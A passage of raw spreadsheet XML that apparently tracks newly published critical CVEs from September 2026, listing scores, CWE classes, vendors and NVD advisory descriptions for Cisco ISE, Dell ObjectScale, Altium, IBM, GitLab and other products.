The vulnerabilities tracked by CVE-2026-20130 are related to improper neutralization of special elements issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-74.</t>
        </is>
      </c>
      <c r="S5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20130</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20192</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr"/>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20192 are related to improper access control issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-284.</t>
        </is>
      </c>
      <c r="S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20192</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65381</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr"/>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>A validation issue existed in the entitlement verification. This issue was addressed with improved validation of the process entitlement. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. A malicious app may be able to break out of its sandbox.</t>
        </is>
      </c>
      <c r="S7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65381</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70416</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr"/>
      <c r="Q8" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>Dell ObjectScale, versions prior to 4.4.0.0, contains a Deserialization of Untrusted Data vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Remote execution.</t>
        </is>
      </c>
      <c r="S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70416</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76423</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the REST API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to gain administrative access to an affected device.
This vulnerability is due to the REST API web service being exposed with insufficient authorization checks. An attacker could exploit this vulnerability by sending a crafted HTTP request to the exposed REST API port. A successful exploit could allow the attacker to read and modify ISE configuration and identity data with administrative privileges.</t>
        </is>
      </c>
      <c r="S9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76423</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92808</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>4760f414-e1ae-4ff1-bdad-c7a9c3538b79</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-918</t>
        </is>
      </c>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>A server-side request forgery (SSRF) vulnerability exists in the UnifiedLogin service of Altium Enterprise Server. An unauthenticated network attacker can cause the server to issue outbound HTTP requests to a destination of the attacker's choosing, including internal services that are reachable only from the server itself.
One such internal service exposes server configuration and credential material without authentication, relying only on the request originating locally. Because the forged requests originate from the server process, that check is satisfied. An unauthenticated attacker can therefore retrieve stored credentials and use them to obtain an administrative session, resulting in full compromise of the server and all of its services. Altium 365 cloud deployments are not affected, as the affected endpoint is disabled in cloud mode.</t>
        </is>
      </c>
      <c r="S10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92808</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16338</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 IBM DataStage could allow a remote authenticated attacker to perform an arbitrary file write due to improper validation of file paths.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16338</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20234</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20234 are related to insufficiently protected credentials issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-522.</t>
        </is>
      </c>
      <c r="S12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20234</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20307</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco ISE could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have at least low-privileged administrative credentials.
This vulnerability is due to insecure deserialization of a user-supplied Java byte stream. An attacker could exploit this vulnerability by sending a crafted serialized Java object to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the device and elevate privileges to root. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a denial of service (DoS) condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.</t>
        </is>
      </c>
      <c r="S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20307</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20322</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard&amp;nbsp;engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20322 are related to improper access control issues that are grouped under the Common Weakness Enumeration (CWE) CWE-284.</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20322</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20324</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the sftunnel inter-device communication protocol of Cisco Secure Firewall Management Center (FMC) Software could allow an authenticated, remote attacker to execute arbitrary commands as root.
This vulnerability exists because a registered sftunnel peer has incorrect permissions to write an arbitrary file to any location on the device. An attacker could exploit this vulnerability by hijacking the sftunnel communication connection or being a valid registered sftunnel peer and sending an sftunnel command to write a malicious file to the disk of an affected device. A successful exploit could allow the attacker to write a file to the device that is executed with root privileges. To exploit this vulnerability, the attacker must have valid user credentials on the affected device.</t>
        </is>
      </c>
      <c r="S15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20324</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20325</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard&amp;nbsp;engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20325 are related to improper neutralization of special elements used in a command issue that are grouped under the Common Weakness Enumeration (CWE) CWE-77.</t>
        </is>
      </c>
      <c r="S16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20325</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20329</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr">
        <is>
          <t>CWE-703</t>
        </is>
      </c>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities. &amp;nbsp;
The vulnerabilities tracked by CVE-2026-20329 are related to issues concerning improper handling of exceptional conditions that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-703.</t>
        </is>
      </c>
      <c r="S17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20329</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20330</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>CWE-707</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities. &amp;nbsp;
The vulnerabilities tracked by CVE-2026-20330 are related to improper neutralization issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-707.</t>
        </is>
      </c>
      <c r="S18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20330</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20332</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Secure Adaptive Security Appliance Software, Cisco Secure Firewall Threat Defense Software and Cisco Secure Firewall Management Center Software engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities. &amp;nbsp;
The vulnerabilities tracked by CVE-2026-20332 are related to improper access control issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-284.</t>
        </is>
      </c>
      <c r="S19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20332</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87719</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab EE affecting all versions from 18.3 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could allow an authenticated user with Duo Chat access to obtain Advanced Search instance configurations and sensitive credentials using a specially crafted GraphQL subscription argument to bypass serialization and perform server object lookup.</t>
        </is>
      </c>
      <c r="S20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87719</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-59953</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr">
        <is>
          <t>pip:lmdeploy</t>
        </is>
      </c>
      <c r="M21" s="5" t="inlineStr">
        <is>
          <t>0.10.2</t>
        </is>
      </c>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr"/>
      <c r="Q21" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
